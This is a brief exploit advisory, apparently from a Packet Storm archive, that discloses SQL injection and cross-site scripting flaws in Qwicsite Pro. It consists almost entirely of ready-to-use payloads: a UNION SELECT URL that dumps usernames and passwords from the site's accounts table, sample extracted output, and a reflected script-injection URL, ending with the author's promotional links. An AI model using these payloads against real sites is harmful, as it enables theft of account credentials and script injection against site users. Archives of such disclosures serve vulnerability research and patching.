qwicsitepro-sqlxss.txt

2008-09-04T00:00:00
ID PACKETSTORM:69632
Type packetstorm
Reporter Cr@zy_King
Modified 2008-09-04T00:00:00

Description

                                        
                                            `By Cr@zy_King a.k.a t4cs1zkr4L  
  
  
Qwicsite Pro (SQL/XSS) Multiple Vulnerabilities  
  
  
http://localhost/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a,password)+from+accounts/*  
  
  
<!-- checkpageuser - -1 union select 1,2,3,concat(0x3a3a,username,0x3a3a,password) from  
accounts/* - - ::al3m::kinq -->  
  
  
::Username::pass  
  
  
  
http://localhost/?pageid=<script>alert("Cr@")</script>  
  
  
  
www.biyosecurity.com - www.heykirmedya.net [Yakinda Online]  
  
  
`